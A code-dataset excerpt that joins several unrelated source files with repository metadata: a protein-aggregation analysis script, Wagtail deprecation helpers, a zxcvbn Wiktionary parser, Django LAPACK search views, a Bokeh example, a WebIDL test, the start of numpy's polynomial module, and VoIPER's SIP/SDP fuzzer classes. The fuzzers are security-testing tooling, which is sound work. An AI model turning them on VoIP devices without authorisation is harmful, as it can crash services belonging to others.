pred_wt.pop(0)
pred_mut.pop(0)
x,y=[],[]
for i in range(0,len(pred_wt)): #max=98.662207
if pred_wt[i]=='NA':
x.append(np.nan)
else:
x.append(float(pred_wt[i]))
for i in range(0,len(pred_mut)): #max=98.996656
if pred_mut[i]=='NA':
y.append(np.nan)
else:
y.append(float(pred_mut[i]))
fig = plt.figure()
a=b=[0,100]
plt.scatter(x, y,edgecolor = 'none', c= 'k')
plt.plot(a,b,'r-')
plt.grid('on')
plt.xlim(-1,101)
plt.ylim(-1,101)
plt.xlabel('Wild types')
plt.ylabel('Deleterious DIDA mutants')
fig.savefig('waltz_envt_wtVSmut.jpg')
#--------------------------------------
# HISTOGRAM
fig = figure()
mu1, std1 = stats.norm.fit(x)
mu2, std2 = stats.norm.fit(y)
xmin1, xmax1 = plt.xlim()
xmin2, xmax2 = plt.xlim()
x1 = np.linspace(xmin1, 100, 100)
x2 = np.linspace(xmin2, 100, 100)
p1 = stats.norm.pdf(x1, mu1, std1)
p2 = stats.norm.pdf(x2, mu2, std2)
plt.plot(x1, p1, 'k',label='Wild types (fit results: mu=%.2f,std=%.2f)'%(mu1, std1))
plt.plot(x2, p2, 'r',label='Deleterious DIDA mutants \n(fit results: mu=%.2f,std=%.2f)'%(mu2, std2))
plt.xlabel('Aggregation conformation predicted values (amylogenic regions)')
plt.ylabel('Frequency')
plt.xlim(0,100)
plt.ylim(0,0.06)
plt.legend(loc='upper right')
fig.savefig('histwaltzenvt_missense.png')
#missense_wt - missense_mut
miss=[]
[miss.append(a_i - b_i) for a_i, b_i in zip(x, y)]
#KOLMOGOROV-SMINORV:
stats.kstest(miss,'norm') # (D,pvalue) = (0.34964202670995748, 0.0)
#So we reject H0 -> not normal distribution
#WILCOXON TEST:
stats.wilcoxon(miss) #-> (T, pvalue) = (8711.0, 0.55024961096028457)
#So we do not reject H0 -> There is no significant difference between wt and mut
#-----------------------------------------------------------------------------
# OUTLIERS FOR AGGREGATION ()
#-----------------------------------------------------------------------------
pred_wt = getColumn(file_wt,3,'\t')
pred_mut = getColumn(file_mut,3,'\t')
pred_wt.pop(0)
pred_mut.pop(0)
pred_envt_wt = getColumn(file_wt,4,'\t')
pred_envt_mut = getColumn(file_mut,4,'\t')
pred_envt_wt.pop(0)
pred_envt_mut.pop(0)
variant_liste = getColumn(file_wt,0,'\t')
output = open('waltz_outliers.csv','w')
output.write('ID,agg_wt,agg_mut,difference,agg_envt_wt,agg_envt_mut,difference_envt\n')
for i in range(0,len(pred_wt)):
for j in range(0,len(pred_mut)):
if i==j:
if pred_wt[i]!='NA'and pred_mut[j]!='NA':
if (abs(float(pred_wt[i])-float(pred_mut[j]))) > 20:
output.write(variant_liste[i+1] + ',' + pred_wt[i] + ',' + pred_mut[j] + ',' + str(abs(float(pred_wt[i])-float(pred_mut[j]))) + ',' + pred_envt_wt[i] + ',' + pred_envt_mut[i] + ',' + str(abs(float(pred_envt_wt[i])-float(pred_envt_mut[j]))) + '\n')
output.close()
#-------------------------------------------------------------------------------
#COMPARISON WITH NETSURFP RSA
#-------------------------------------------------------------------------------
W_wt = pd.read_csv(file_wt,'\t')
W_mut = pd.read_csv(file_mut,'\t')
W_wt['DWaltz'] = ''
W_wt['DWaltz'] = W_wt.aggregation - W_mut.aggregation
W_wt['DWaltz_envt'] = ''
W_wt['DWaltz_envt'] = W_wt.aggregation_envt - W_mut.aggregation_envt
W_wt = W_wt.drop(['aggregation','aggregation_envt'], 1)
W_wt.to_csv('waltzresults_compare.csv', index=False)
#RESIDUE
waltz = getColumn('waltzresults_compare.csv',3,',')
waltz.pop(0)
netsurfp = getColumn('netsurfpresults_compare.csv',3,',')
netsurfp.pop(0)
x,y=[],[]
for i in range(0,len(netsurfp)): #min=-0.183 and max=0.302
if netsurfp[i]=='':
x.append(np.nan)
else:
x.append(float(netsurfp[i]))
for i in range(0,len(waltz)): #min=-98.862207 and max=98.327759
if waltz[i]=='':
y.append(np.nan)
else:
y.append(float(waltz[i]))
fig = plt.figure()
plt.scatter(x, y,edgecolor = 'none', c= 'k')
plt.grid('on')
plt.xlim(-0.4,0.4)
plt.ylim(-100,100)
plt.xlabel('delta(Solvent accessibility prediction) by NetSurfP')
plt.ylabel('delta(Aggregation conformation prediction) by Waltz')
fig.savefig('WaltzVSnetsurfp.jpg')
#ENVIRONMENT
waltz_envt = getColumn('waltzresults_compare.csv',4,',')
waltz_envt.pop(0)
netsurfp_envt = getColumn('netsurfpresults_compare.csv',4,',')
netsurfp_envt.pop(0)
x,y=[],[]
for i in range(0,len(netsurfp_envt)): #min=-0.183 and max=0.302
if netsurfp_envt[i]=='':
x.append(np.nan)
else:
x.append(float(netsurfp_envt[i]))
for i in range(0,len(waltz_envt)): #min=-98.862207 and max=98.327759
if waltz_envt[i]=='':
y.append(np.nan)
else:
y.append(float(waltz_envt[i]))
fig = plt.figure()
plt.scatter(x, y,edgecolor = 'none', c= 'k')
plt.grid('on')
plt.xlim(-0.4,0.4)
plt.ylim(-100,100)
plt.xlabel('delta(Solvent accessibility prediction) by NetSurfP')
plt.ylabel('delta(Aggregation conformation prediction) by Waltz')
fig.savefig('WaltzVSnetsurfp_envt.jpg')
| mit | 942,647,626,473,666,200 | 30.836134 | 268 | 0.599974 | false |
kurtrwall/wagtail | wagtail/utils/deprecation.py | 2 | 1995 | from __future__ import absolute_import, unicode_literals
import warnings
class RemovedInWagtail17Warning(DeprecationWarning):
pass
removed_in_next_version_warning = RemovedInWagtail17Warning
class RemovedInWagtail18Warning(PendingDeprecationWarning):
pass
class ThisShouldBeAList(list):
"""
Some properties - such as Indexed.search_fields - used to be tuples. This
is incorrect, and they should have been lists. Changing these to be a list
now would be backwards incompatible, as people do
.. code-block:: python
search_fields = Page.search_fields + (
SearchField('body')
)
Adding a tuple to the end of a list causes an error.
This class will allow tuples to be added to it, as in the above behaviour,
but will raise a deprecation warning if someone does this.
"""
message = 'Using a {type} for {name} is deprecated, use a list instead'
def __init__(self, items, name, category):
super(ThisShouldBeAList, self).__init__(items)
self.name = name
self.category = category
def _format_message(self, rhs):
return self.message.format(name=self.name, type=type(rhs).__name__)
def __add__(self, rhs):
cls = type(self)
if isinstance(rhs, tuple):
# Seems that a tuple was passed in. Raise a deprecation
# warning, but then keep going anyway.
message = self._format_message(rhs)
warnings.warn(message, category=self.category, stacklevel=2)
rhs = list(rhs)
return cls(super(ThisShouldBeAList, self).__add__(list(rhs)),
name=self.name, category=self.category)
class SearchFieldsShouldBeAList(ThisShouldBeAList):
"""
Indexed.search_fields was a tuple, but it should have been a list
"""
def __init__(self, items, name='search_fields', category=RemovedInWagtail17Warning):
super(SearchFieldsShouldBeAList, self).__init__(items, name, category)
| bsd-3-clause | 5,485,424,418,171,346,000 | 31.704918 | 88 | 0.665163 | false |
paulballesty/zxcvbn | data-scripts/count_wiktionary.py | 16 | 2670 | #!/usr/bin/python
import os
import sys
import codecs
import operator
from unidecode import unidecode
def usage():
return '''
This script extracts words and counts from a 2006 wiktionary word frequency study over American
television and movies. To use, first visit the study and download, as .html files, all 26 of the
frequency lists:
https://en.wiktionary.org/wiki/Wiktionary:Frequency_lists#TV_and_movie_scripts
Put those into a single directory and point it to this script:
%s wiktionary_html_dir ../data/us_tv_and_film.txt
output.txt will include one line per word in the study, ordered by rank, of the form:
word1 count1
word2 count2
...
''' % sys.argv[0]
def parse_wiki_tokens(html_doc_str):
'''fragile hax, but checks the result at the end'''
results = []
last3 = ['', '', '']
header = True
skipped = 0
for line in html_doc_str.split('\n'):
last3.pop(0)
last3.append(line.strip())
if all(s.startswith('<td>') and not s == '<td></td>' for s in last3):
if header:
header = False
continue
last3 = [s.replace('<td>', '').replace('</td>', '').strip() for s in last3]
rank, token, count = last3
rank = int(rank.split()[0])
token = token.replace('</a>', '')
token = token[token.index('>')+1:]
token = normalize(token)
# wikitonary has thousands of words that end in 's
# keep the common ones (rank under 1000), discard the rest
#
# otherwise end up with a bunch of duplicates eg victor / victor's
if token.endswith("'s") and rank > 1000:
skipped += 1
continue
count = int(count)
results.append((rank, token, count))
# early docs have 1k entries, later 2k, last 1284
assert len(results) + skipped in [1000, 2000, 1284]
return results
def normalize(token):
return unidecode(token).lower()
def main(wiktionary_html_root, output_filename):
rank_token_count = [] # list of 3-tuples
for filename in os.listdir(wiktionary_html_root):
path = os.path.join(wiktionary_html_root, filename)
with codecs.open(path, 'r', 'utf8') as f:
rank_token_count.extend(parse_wiki_tokens(f.read()))
rank_token_count.sort(key=operator.itemgetter(0))
with codecs.open(output_filename, 'w', 'utf8') as f:
for rank, token, count in rank_token_count:
f.write('%-18s %d\n' % (token, count))
if __name__ == '__main__':
if len(sys.argv) != 3:
print usage()
else:
main(*sys.argv[1:])
sys.exit(0)
| mit | 4,693,949,418,690,449,000 | 32.375 | 96 | 0.601873 | false |
LighthouseHPC/lighthouse | src/Dlighthouse/lighthouse/views/lapack_sylvester.py | 2 | 8761 | import string, types, sys, os, StringIO, re, shlex, json, zipfile
from collections import OrderedDict
from itertools import chain
from django.contrib.auth.decorators import login_required
from django.core.servers.basehttp import FileWrapper
from django.http import HttpResponse, HttpResponseNotFound
from django.shortcuts import render_to_response, redirect, render
from django.template import RequestContext
from django.template.loader import render_to_string
from django.views.decorators.csrf import csrf_exempt
from lighthouse.forms.lapack_sylvester import *
from lighthouse.models.lapack_sylvester import lapack_sylvester
from lighthouse.models.lapack_choiceDict import *
from lighthouse.views.lapack_eigen import question_and_answer
import datetime
##############################################
######--------- Guided Search --------- ######
##############################################
form_order_standard = ('standardGeneralizedForm', 'complexNumberForm', 'standardConditionForm', 'singleDoubleForm') ## form order for standard Sylvester equation
form_order_generalized = ('standardGeneralizedForm', 'complexNumberForm', 'generalizedConditionForm', 'singleDoubleForm') ## form order for generalized Sylvester equation
form_HTML = ['standardGeneralizedForm', 'standardConditionForm', 'generalizedConditionForm'] ## forms with HTML format
### help functions
def find_nextForm(currentForm_name, request):
print request.session['form_order']
current_index = request.session['form_order'].index(currentForm_name)
nextForm_name = ""
nextForm = ""
try:
## search for 'none' and return the first column that has zero to be the next question/form
next_index = next(i for i in range(current_index+1, len(request.session['form_order'])))
nextForm_name = request.session['form_order'][next_index]
print nextForm_name
nextForm = getattr(sys.modules[__name__], nextForm_name)()
## the end of the guided search or other errors
except Exception as e:
print type(e)
print "e.message: ", e.message
print "e.args: ", e.args
return {'nextForm_name': nextForm_name, 'nextForm': nextForm}
### set up initial sessions
def sessionSetup(request):
for item in ['standardGeneralizedForm', 'standardConditionForm', 'generalizedConditionForm', 'complexNumberForm', 'singleDoubleForm']:
key = 'sylvester_'+item[:-4]
request.session[key] = ''
request.session['currentForm_name'] = 'standardGeneralizedForm'
request.session['Results'] = lapack_sylvester.objects.all()
request.session['sylvester_guided_answered'] = OrderedDict()
request.session['form_order'] = []
### start guided search views
def index(request):
# set up session keys and values
sessionSetup(request)
## get ready for the template
context = {
'formHTML': "standardGeneralizedForm",
'form': "invalid",
'sylvester_guided_answered' : '',
'results' : 'start',
}
return render_to_response('lighthouse/lapack_sylvester/index.html', context_instance=RequestContext(request, context))
def guidedSearch(request):
form = getattr(sys.modules[__name__], request.session['currentForm_name'])(request.GET or None)
if form.is_valid():
## get current question and user's answer
current_question = request.session['currentForm_name'][:-4]
formField_name = 'sylvester_'+current_question
value = form.cleaned_data[formField_name]
choices = form.fields[formField_name].choices
request.session['sylvester_guided_answered'].update(question_and_answer(form, value, choices))
## generate a session for current question/answer -->request.session[sylvester_currentQuestion] = answer
request.session[formField_name] = value
## decide which form order to use
if request.session['currentForm_name'] == 'standardGeneralizedForm' and request.session['sylvester_standardGeneralized'] == 'standard':
request.session['form_order'] = form_order_standard
elif request.session['currentForm_name'] == 'standardGeneralizedForm' and request.session['sylvester_standardGeneralized'] == 'generalized':
request.session['form_order'] = form_order_generalized
if request.session['sylvester_standardCondition'] == 'no' or request.session['sylvester_generalizedCondition'] == 'no': ## stop search
return index(request)
else:
## do search based on user's response (no search needed for 'standardConditionForm', 'generalizedConditionForm')
if request.session['currentForm_name'] not in ['standardConditionForm', 'generalizedConditionForm']:
lookup = "%s__contains" % current_question
query = {lookup : value}
request.session['Results'] = request.session['Results'].filter(**query)
## call function find_nextForm to set up next form for next question
dict_nextQuestion = find_nextForm(request.session['currentForm_name'], request)
nextForm_name = dict_nextQuestion['nextForm_name']
nextForm = dict_nextQuestion['nextForm']
## make next form current for request.session['currentForm_name']
request.session['currentForm_name'] = nextForm_name
## decide whether or not to use form HTML files (if help buttons are needed, use HTML file instead of form)
if nextForm_name in form_HTML:
formHTML = nextForm_name
else:
formHTML = "invalid"
## get ready for the template
context = {
'formHTML': formHTML,
'form': nextForm,
'sylvester_guided_answered' : request.session['sylvester_guided_answered'],
'results' : request.session['Results']
}
return render_to_response('lighthouse/lapack_sylvester/index.html', context_instance=RequestContext(request, context))
else:
return index(request)
##############################################
######-------- Advanced Search -------- ######
##############################################
def advancedSearch(request):
standardDict = {'complexNumber':[], 'singleDouble':[]}
generalizedDict = {'complexNumber':[], 'singleDouble':[]}
request.session['advancedResults'] = []
form = advancedForm(request.POST or None)
### search for standard routines
if form['standard_search'].value() == 'yes':
## get standard data
standardDict['complexNumber'] = form['standard_complexNumber'].value()
standardDict['singleDouble'] = form['standard_singleDouble'].value()
## search for standard routines
for item1 in standardDict['complexNumber']:
for item2 in standardDict['singleDouble']:
kwargs = {
'standardGeneralized': 'standard',
'complexNumber': item1,
'singleDouble': item2,
}
request.session['advancedResults'].extend(lapack_sylvester.objects.filter(**kwargs))
### search for generalized routines
if form['generalized_search'].value() == 'yes':
## get generalized data
generalizedDict['complexNumber'] = form['generalized_complexNumber'].value()
generalizedDict['singleDouble'] = form['generalized_singleDouble'].value()
## search for generalized routines
for item1 in generalizedDict['complexNumber']:
for item2 in generalizedDict['singleDouble']:
print item1, item2
kwargs = {
'standardGeneralized': 'generalized',
'complexNumber': item1,
'singleDouble': item2,
}
request.session['advancedResults'].extend(lapack_sylvester.objects.filter(**kwargs))
## be ready for switching to guided search
sessionSetup(request)
## context includes guided search form
context = {
'form_submitted': form,
'results': request.session['advancedResults'],
'AdvancedTab': True,
'formHTML': "standardGeneralizedForm",
'form': "invalid",
'sylvester_guided_answered' : '',
}
return render_to_response('lighthouse/lapack_sylvester/index.html', context_instance=RequestContext(request, context))
| mit | 4,027,494,882,457,814,500 | 43.472081 | 172 | 0.622189 | false |
deadlyraptor/reels | spreadchimp.py | 1 | 2493 | import os
import csv
import xlrd
# Assumes the directory with the workbook is relative to the script's location.
directory = 'workbooks/'
file = os.listdir(directory)[0]
workbook = (f'{directory}/{file}')
# Preps the workbook that contains the information desired.
wb = xlrd.open_workbook(workbook)
sh = wb.sheet_by_index(0)
total_rows = sh.nrows
first_row = 6 # skips the first six rows as they are irrelevant.
# Collects the names of all the films for which individual workbooks need to be
# created.
films = []
for row in range(first_row, total_rows):
row_values = sh.row_values(row)
film_title = row_values[20]
if film_title in films:
pass
else:
films.append(film_title)
def prep_contacts(film):
'''Collects all contacts that match the given film into a list that will be
used to write to the actual spreadsheet.
Arguments:
film = The film that contacts purchased tickets for.
Returns:
contacts = The list of all contacts for a given film.
'''
contacts = []
for row in range(first_row, total_rows):
contact = []
row_values = sh.row_values(row)
opt_in = row_values[5]
film_title = row_values[20]
if not opt_in:
continue
elif opt_in and film_title == film:
address = '{0} {1} {2} {3} {4}'.format(
row_values[11], # address 1
row_values[12], # address 2
row_values[13].title(), # city
row_values[14], # state
row_values[15]) # zip
contact = [row_values[3], # email
row_values[2].title(), # first name
row_values[1].title(), # last name
row_values[16].replace('No Primary Phone', ''), # phone
address] # full address
contacts.append(contact)
return contacts
headers = ['Email', 'First Name', 'Last Name', 'Phone', 'Full Address']
for film in films:
contacts = prep_contacts(film)
with open(f'{film}.csv', mode='w') as outfile:
writer = csv.writer(outfile, delimiter=',', quotechar='"',
quoting=csv.QUOTE_MINIMAL)
writer.writerow(headers)
for contact in contacts:
writer.writerow(contact)
| mit | 7,726,040,187,664,603,000 | 34.112676 | 79 | 0.546731 | false |
satishgoda/bokeh | examples/plotting/file/unemployment.py | 46 | 1846 | from collections import OrderedDict
import numpy as np
from bokeh.plotting import ColumnDataSource, figure, show, output_file
from bokeh.models import HoverTool
from bokeh.sampledata.unemployment1948 import data
# Read in the data with pandas. Convert the year column to string
data['Year'] = [str(x) for x in data['Year']]
years = list(data['Year'])
months = ["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec"]
data = data.set_index('Year')
# this is the colormap from the original plot
colors = [
"#75968f", "#a5bab7", "#c9d9d3", "#e2e2e2", "#dfccce",
"#ddb7b1", "#cc7878", "#933b41", "#550b1d"
]
# Set up the data for plotting. We will need to have values for every
# pair of year/month names. Map the rate to a color.
month = []
year = []
color = []
rate = []
for y in years:
for m in months:
month.append(m)
year.append(y)
monthly_rate = data[m][y]
rate.append(monthly_rate)
color.append(colors[min(int(monthly_rate)-2, 8)])
source = ColumnDataSource(
data=dict(month=month, year=year, color=color, rate=rate)
)
output_file('unemployment.html')
TOOLS = "resize,hover,save,pan,box_zoom,wheel_zoom"
p = figure(title="US Unemployment (1948 - 2013)",
x_range=years, y_range=list(reversed(months)),
x_axis_location="above", plot_width=900, plot_height=400,
toolbar_location="left", tools=TOOLS)
p.rect("year", "month", 1, 1, source=source,
color="color", line_color=None)
p.grid.grid_line_color = None
p.axis.axis_line_color = None
p.axis.major_tick_line_color = None
p.axis.major_label_text_font_size = "5pt"
p.axis.major_label_standoff = 0
p.xaxis.major_label_orientation = np.pi/3
hover = p.select(dict(type=HoverTool))
hover.tooltips = OrderedDict([
('date', '@month @year'),
('rate', '@rate'),
])
show(p) # show the plot
| bsd-3-clause | -3,850,662,520,255,630,000 | 27.84375 | 82 | 0.667389 | false |
birryree/servo | components/script/dom/bindings/codegen/parser/tests/test_conditional_dictionary_member.py | 120 | 3162 | def WebIDLTest(parser, harness):
parser.parse("""
dictionary Dict {
any foo;
[ChromeOnly] any bar;
};
""")
results = parser.finish()
harness.check(len(results), 1, "Should have a dictionary")
members = results[0].members;
harness.check(len(members), 2, "Should have two members")
# Note that members are ordered lexicographically, so "bar" comes
# before "foo".
harness.ok(members[0].getExtendedAttribute("ChromeOnly"),
"First member is not ChromeOnly")
harness.ok(not members[1].getExtendedAttribute("ChromeOnly"),
"Second member is ChromeOnly")
parser = parser.reset()
parser.parse("""
dictionary Dict {
any foo;
any bar;
};
interface Iface {
[Constant, Cached] readonly attribute Dict dict;
};
""")
results = parser.finish()
harness.check(len(results), 2, "Should have a dictionary and an interface")
parser = parser.reset()
exception = None
try:
parser.parse("""
dictionary Dict {
any foo;
[ChromeOnly] any bar;
};
interface Iface {
[Constant, Cached] readonly attribute Dict dict;
};
""")
results = parser.finish()
except Exception, exception:
pass
harness.ok(exception, "Should have thrown.")
harness.check(exception.message,
"[Cached] and [StoreInSlot] must not be used on an attribute "
"whose type contains a [ChromeOnly] dictionary member",
"Should have thrown the right exception")
parser = parser.reset()
exception = None
try:
parser.parse("""
dictionary ParentDict {
[ChromeOnly] any bar;
};
dictionary Dict : ParentDict {
any foo;
};
interface Iface {
[Constant, Cached] readonly attribute Dict dict;
};
""")
results = parser.finish()
except Exception, exception:
pass
harness.ok(exception, "Should have thrown (2).")
harness.check(exception.message,
"[Cached] and [StoreInSlot] must not be used on an attribute "
"whose type contains a [ChromeOnly] dictionary member",
"Should have thrown the right exception (2)")
parser = parser.reset()
exception = None
try:
parser.parse("""
dictionary GrandParentDict {
[ChromeOnly] any baz;
};
dictionary ParentDict : GrandParentDict {
any bar;
};
dictionary Dict : ParentDict {
any foo;
};
interface Iface {
[Constant, Cached] readonly attribute Dict dict;
};
""")
results = parser.finish()
except Exception, exception:
pass
harness.ok(exception, "Should have thrown (3).")
harness.check(exception.message,
"[Cached] and [StoreInSlot] must not be used on an attribute "
"whose type contains a [ChromeOnly] dictionary member",
"Should have thrown the right exception (3)")
| mpl-2.0 | -8,570,901,832,487,830,000 | 27.745455 | 80 | 0.568627 | false |
firebitsbr/raspberry_pwn | src/pentest/voiper/fuzzer/fuzzers.py | 8 | 10273 | '''
This file is part of VoIPER.
VoIPER is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 2 of the License, or
(at your option) any later version.
VoIPER is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with VoIPER. If not, see <http://www.gnu.org/licenses/>.
Copyright 2008, http://www.unprotectedhex.com
Contact: nnp@unprotectedhex.com
'''
import sys
import os
import string
import time
# modify import path instead of adding a __init__.py as I want to keep
# a the Sulley install as unmodified as possible to facilitate easy updating
# if there are changes to it.
# Props to Pedram Amini and Aaron Portnoy for creating such a great framework
sys.path.append(''.join([os.getcwd(), '/sulley']))
from random import Random
from protocol_logic.sip_agent import T_COMPLETE_OK
from protocol_logic.sip_utilities import SIPCrashDetector
from protocol_logic.sip_utilities import SIPInviteCanceler
from protocol_logic import sip_parser
from misc.utilities import Logger
from fuzzer_parents import AbstractFuzzer
from fuzzer_parents import AbstractSIPFuzzer
from fuzzer_parents import AbstractSIPInviteFuzzer
from socket import *
from sulley import *
################################################################################
class Callable:
def __init__(self, anycallable):
'''
Wrapper class so I can have unbound class methods. Apparently python doesn't
allow these by default. This code/idiom came from some standard example on the
Interwebs
'''
self.__call__ = anycallable
class SIPInviteStructureFuzzer(AbstractSIPInviteFuzzer):
'''
Fuzz the structure of an INVITE request e.g repeats, line folding etc
'''
def fuzz(self):
self.sess.add_target(self.target)
self.sess.connect(s_get("INVITE_STRUCTURE"), callback=self.generate_unique_attributes)
self.sess.fuzz()
def info(self=None):
h = ["Name: SIPInviteStructureFuzzer\n",
"Protocol: SIP\n",
"Success Factor: Low\n",
"Fuzzes the structure of a SIP request by repeating blocks, fuzzing delimiters and ",
"generally altering how a SIP request is structured",
]
return ''.join(h)
info = Callable(info)
class SIPInviteRequestLineFuzzer(AbstractSIPInviteFuzzer):
def fuzz(self):
self.sess.add_target(self.target)
self.sess.connect(s_get("INVITE_REQUEST_LINE"), callback=self.generate_unique_attributes)
self.sess.fuzz()
def info(self=None):
h = ["Name: SIPInviteRequestLineFuzzer\n",
"Protocol: SIP\n",
"Success Factor: Low\n",
"Extensively tests the first line of an INVITE request by including all valid parts ",
"specified in SIP RFC 3375"
]
return ''.join(h)
info = Callable(info)
class SIPInviteCommonFuzzer(AbstractSIPInviteFuzzer):
def fuzz(self):
self.sess.add_target(self.target)
self.sess.connect(s_get("INVITE_COMMON"), callback=self.generate_unique_attributes)
self.sess.fuzz()
def info(self=None):
h = ["Name: SIPInviteCommonFuzzer\n",
"Protocol: SIP\n",
"Success Factor: High\n",
"Fuzzes the headers commonly found and most likely to be processed in a SIP INVITE request\n"
]
return ''.join(h)
info = Callable(info)
class SIPInviteOtherFuzzer(AbstractSIPInviteFuzzer):
def fuzz(self):
self.sess.add_target(self.target)
self.sess.connect(s_get("INVITE_OTHER"), callback=self.generate_unique_attributes)
self.sess.fuzz()
def info(self=None):
h = ["Name: SIPInviteOtherFuzzer\n",
"Protocol: SIP\n",
"Success Factor: Low\n",
"Tests all other headers specified as part of an INVITE besides those found in the ",
"SIPInviteCommonFuzzer. Many of these are seemingly unparsed and ignored by a lot of devices.\n"
]
return ''.join(h)
info = Callable(info)
class SDPFuzzer(AbstractSIPInviteFuzzer):
'''
Extends the Abstract INVITE fuzzer because it requires the INVITE
cancelling functionality. Fuzzes the SDP content of an INVITE.
'''
def fuzz(self):
self.sess.add_target(self.target)
self.sess.connect(s_get("SDP"), callback=self.generate_unique_attributes)
self.sess.fuzz()
def info(self=None):
h = ["Name: SDPFuzzer\n",
"Protocol: SDP\n",
"Success Factor: High\n",
"Fuzzes the SDP protocol as part of a SIP INVITE\n"
]
return ''.join(h)
info = Callable(info)
class SIPDumbACKFuzzer(AbstractSIPFuzzer):
'''
A dumb ACK fuzzer that doesn't wait for any kind of responses or what not.
'''
def fuzz(self):
self.sess.add_target(self.target)
self.sess.connect(s_get("ACK"), callback=self.generate_unique_attributes)
self.sess.fuzz()
def info(self=None):
h = ["Name: SIPDumbACKFuzzer\n",
"Protocol: SIP\n",
"Success Factor: Unknown\n",
"A dumb ACK fuzzer with no transaction state awareness. \n",
]
return ''.join(h)
info = Callable(info)
class SIPDumbCANCELFuzzer(AbstractSIPFuzzer):
'''
A dumb CANCEL fuzzer that doesn't wait for any kind of responses or what not.
'''
def fuzz(self):
self.sess.add_target(self.target)
self.sess.connect(s_get("CANCEL"), callback=self.generate_unique_attributes)
self.sess.fuzz()
def info(self=None):
h = ["Name: SIPDumbCANCELFuzzer\n",
"Protocol: SIP\n",
"Success Factor: Unknown\n",
"A dumb CANCEL request fuzzer with no transaction state awareness\n",
]
return ''.join(h)
info = Callable(info)
class SIPDumbREGISTERFuzzer(AbstractSIPFuzzer):
def fuzz(self):
self.sess.add_target(self.target)
self.sess.connect(s_get("REGISTER"), callback=self.generate_unique_attributes)
self.sess.fuzz()
def info(self=None):
h = ["Name: SIPDumbREGISTERFuzzer\n",
"Protocol: SIP\n",
"Success Factor: Unknown\n",
"A dumb REGISTER request fuzzer with no transaction state awareness\n",
]
return ''.join(h)
info = Callable(info)
class SIPSUBSCRIBEFuzzer(AbstractSIPFuzzer):
def fuzz(self):
self.sess.add_target(self.target)
self.sess.connect(s_get("SUBSCRIBE"), callback=self.generate_unique_attributes)
self.sess.fuzz()
def info(self=None):
h = ["Name: SIPSUBSCRIBEFuzzer\n",
"Protocol: SIP\n",
"Success Factor: Unknown\n",
"A fuzzer for the SUBSCRIBE SIP verb\n",
]
return ''.join(h)
info = Callable(info)
class SIPNOTIFYFuzzer(AbstractSIPFuzzer):
def fuzz(self):
self.sess.add_target(self.target)
self.sess.connect(s_get("NOTIFY"), callback=self.generate_unique_attributes)
self.sess.fuzz()
def info(self=None):
h = ["Name: SIPNOTIFYFuzzer\n",
"Protocol: SIP\n",
"Success Factor: Unknown\n",
"A fuzzer for the NOTIFY SIP verb\n",
]
return ''.join(h)
info = Callable(info)
class SIPACKFuzzer(AbstractSIPFuzzer):
def fuzz(self):
self.invite_cancel_dict = {
sip_parser.r_SEND : (self.invite.process,
{sip_parser.r_1XX : (self.cancel.process,
{sip_parser.r_4XX : (None, None),
sip_parser.r_5XX : (None, None),
sip_parser.r_6XX : (None, None),
sip_parser.r_2XX : (None, None),
}
)
}
)
}
self.pre_send_functions.append(self.invite_cancel)
self.sess.add_target(self.target)
self.sess.connect(s_get("ACK"), callback=self.generate_unique_attributes)
self.sess.fuzz()
def info(self=None):
h = ["Name: SIPACKFuzzer\n",
"Protocol: SIP\n",
"Success Factor: Unknown\n",
"A fuzzer for the ACK SIP verb that first attempts to manipulate the target device into a state where it would expect an ACK\n",
]
return ''.join(h)
info = Callable(info)
def invite_cancel(self, sock):
result = None
while result != T_COMPLETE_OK:
result, self.curr_invite_branch = self.sip_agent.process_transaction(
self.invite_cancel_dict,
self.response_q,
self.request_q,
{'user' : self.user,
'target_user' : self.target_user,
'host' : self.host,
'port' : self.port}
)
if result != T_COMPLETE_OK:
print >>sys.stderr, 'Invite cancel for ACK fuzz didnt complete. Trying again'
time.sleep(.2)
'''
class SDPEncodedFuzzer(AbstractSIPInviteFuzzer):
def fuzz(self):
self.sess.add_target(self.target)
self.sess.connect(s_get("SDP_ENCODED"), callback=self.generate_unique_attributes)
self.sess.fuzz()
class OptionsFuzzer(AbstractSIPFuzzer):
def fuzz(self):
self.sess.add_target(self.target)
self.sess.connect(s_get("OPTIONS"), callback=self.generate_unique_attributes)
self.sess.fuzz()
'''
################################################################################
| gpl-3.0 | 7,845,512,082,045,229,000 | 33.129568 | 141 | 0.591064 | false |
bakkou-badri/dataminingproject | env/lib/python2.7/site-packages/numpy/polynomial/polynomial.py | 14 | 47103 | """
Objects for dealing with polynomials.
This module provides a number of objects (mostly functions) useful for
dealing with polynomials, including a `Polynomial` class that
encapsulates the usual arithmetic operations. (General information
on how this module represents and works with polynomial objects is in
the docstring for its "parent" sub-package, `numpy.polynomial`).
Constants
---------
- `polydomain` -- Polynomial default domain, [-1,1].
- `polyzero` -- (Coefficients of the) "zero polynomial."
- `polyone` -- (Coefficients of the) constant polynomial 1.
- `polyx` -- (Coefficients of the) identity map polynomial, ``f(x) = x``.
Arithmetic
----------
- `polyadd` -- add two polynomials.
- `polysub` -- subtract one polynomial from another.
- `polymul` -- multiply two polynomials.
- `polydiv` -- divide one polynomial by another.
- `polypow` -- raise a polynomial to an positive integer power
- `polyval` -- evaluate a polynomial at given points.
- `polyval2d` -- evaluate a 2D polynomial at given points.
- `polyval3d` -- evaluate a 3D polynomial at given points.
- `polygrid2d` -- evaluate a 2D polynomial on a Cartesian product.
- `polygrid3d` -- evaluate a 3D polynomial on a Cartesian product.
Calculus
--------
- `polyder` -- differentiate a polynomial.
- `polyint` -- integrate a polynomial.
Misc Functions
--------------
- `polyfromroots` -- create a polynomial with specified roots.
- `polyroots` -- find the roots of a polynomial.
- `polyvander` -- Vandermonde-like matrix for powers.
- `polyvander2d` -- Vandermonde-like matrix for 2D power series.
- `polyvander3d` -- Vandermonde-like matrix for 3D power series.
- `polycompanion` -- companion matrix in power series form.
- `polyfit` -- least-squares fit returning a polynomial.
- `polytrim` -- trim leading coefficients from a polynomial.
- `polyline` -- polynomial representing given straight line.
Classes
-------
- `Polynomial` -- polynomial class.
See also
--------
`numpy.polynomial`
"""
from __future__ import division, absolute_import, print_function
__all__ = ['polyzero', 'polyone', 'polyx', 'polydomain', 'polyline',
